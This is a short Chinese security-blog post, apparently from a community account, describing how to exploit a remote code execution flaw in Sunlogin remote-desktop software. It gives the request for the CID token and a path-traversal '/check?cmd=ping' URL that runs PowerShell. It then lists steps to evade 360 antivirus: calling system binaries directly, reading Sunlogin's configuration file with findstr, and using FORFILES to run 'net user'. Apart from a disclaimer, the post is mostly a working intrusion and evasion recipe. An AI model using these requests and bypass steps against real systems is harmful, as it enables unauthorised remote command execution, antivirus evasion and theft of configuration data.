向日葵RCEbypass

发布于 作者:

向日葵RCEbypass

原创 无问社区 白帽子社区团队 2024-09-14 16:16

本文仅用于技术研究学习,请遵守相关法律,禁止使用本文所提及的相关技术开展非法攻击行为,由于传播、利用本文所提供的信息而造成任何不良后果及损失,与本账号及作者无关。

关于无问社区

无问社区致力于打造一个面向于网络安全从业人员的技术综合服务社区,可
免费获取安全技术资料,社区可提供的技术资料覆盖全网,辅助学习的功能丰富。

特色功能:划词解析、调取同类技术资料、
AI助手全网智能检索、基于推荐算法,为每一位用户量身定制专属技术资料。

无问社区-官网:http://wwlib.cn

无问社区站内阅读
链接:

http://www.wwlib.cn/index.php/artread/artid/9157.html

1. 获取 CID

http://ip:port/cgi-bin/rpc?action=verify-haras

2.借助 ping 命令进行拼接

修改 Cookie:CID=xxxxx 

/check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fw
indows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershe   ll.exe+%20whoami

当存在防护软件时执行命令会告警failed,error 5:表示命令执行失败

我们可以先使用他的正常命令 ping 来查看命令执行漏洞是否存在

我们从上图可以得知 360 是拦截了PowerShell 调用尝试调用CMD 执行命令看看

发现CMD 调用和 PowerShell 调用都被拦截了,思路就此转换成不使用CMD 和 PowerShell

3执行命令

1.直接调用systeminfo.exe 获取操作系统信息

2.直接调用 netstat.exe 获取操作系统信息

3.直接调用tasklist.exe 来获得进程信息我们可以看到是存在 360 进程的

4.直接调用ipconfig.exe 获得IP 信息

5.直接调用arp.exe 获得内网其他IP

6.直接调用whoami.exe 查看当前权限

7.使用 findstr.exe 读取向日葵配置文件

8.使用FORFILES调用 CMD 执行任意命令bypass 360 拦截(2022-06-26)

使用FORFILES 执行 net user 成功执行

正常调用 net.exe 执行 net user 被拦截

网络钓鱼:OLE+LNK(文末转发福利)

CTF-phar为协议分析(文末转发奖励)

ThinkCMF框架任意内容包含漏洞的讲解

【SRC思路】SRC小姿势(1)

无问社区助手1.5来了,海量网安资料随意看(文末转发福利)

加入粉丝群可在公众号页面联系我们进群

点“阅读原文”,访问无问社区